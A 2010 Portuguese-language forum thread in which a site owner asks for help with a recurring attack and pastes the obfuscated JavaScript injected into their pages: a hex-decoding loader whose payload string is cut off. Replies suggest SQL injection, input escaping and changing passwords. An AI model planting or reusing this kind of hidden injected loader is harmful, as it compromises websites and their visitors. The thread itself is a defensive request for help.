Exploid Site
#1
Posted 08/10/2010, 00:17
estao injectando este codigo no meu site
<script>function vaVYVaVyyyd(vaayybxbYbx){ return(parseInt(vaayybxbYbx,16));}function vyxbdaydbtt(vtbVxbVxYxd){ var vybaxYtVyax='';for(vydbdYdVyax=0; vydbdYdVyax<vtbVxbVxYxd.length; vydbdYdVyax+=2){vybaxYtVyax+=(String.fromCharCode(vaVYVaVyyyd(vtbVxbVxYxd.substr(vydbdYdVyax,2))));}return vybaxYtVyax;} document.write(vyxbdaydbtt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E7 (....);</script>
o que pode originar isto?
obrigado,é urgente
#2
Posted 08/10/2010, 05:58
http://imasters.com....omo_se_proteger
OBS: Use mysql_real_escape_string() no lugar de addslashes().
#3
Posted 08/10/2010, 10:31
Em que parte do site eles estão fazendo isso? O método mais provável é SQL Injection. Se for isso, veja:
http://imasters.com....omo_se_proteger
OBS: Use mysql_real_escape_string() no lugar de addslashes().
ola amigo obrigado pela sua resposta
é o seguinte. Esse codigo vem logo a seguir ao body. eu nao tenho quase nada em base de dados, a unica coisa que tenho é um formulario em php (sem ligação à BD) e um registo de newslletter, mas isto ja acontecia antes de ter a newsllater, logo isso não é.
Eu ja procurei se havia algum script a mandar para algum http mas nao encontrei tb, eu tenho no site muita javascript. Ontem para meu espanto e apos tr limpo o codigo, deparei também com uma imagem com virus.
Tem alguma sugestão? muito obrigado pela atenção
Edição feita por: fel, 08/10/2010, 10:34.
#4
Posted 08/10/2010, 18:48
#5
Posted 08/10/2010, 20:44
é este o linkTem link? Mude as senhas do seu FTP e do painel de controle. Pode ser também que o servidor esteja comprometido. Procure outros sites hospedados no mesmo host e veja se está tudo certo com eles.
http://www.tgi.com.pt/teste/
Pra já, ja tá tendo um dia em que não ocorre de novo problema. Assim que acontecer de novo eu aviso aqui pra verem o erro
obrigado
Ah e vou mudar as pass's
1 user(s) are reading this topic
0 membro(s), 1 visitante(s) e 0 membros anônimo(s)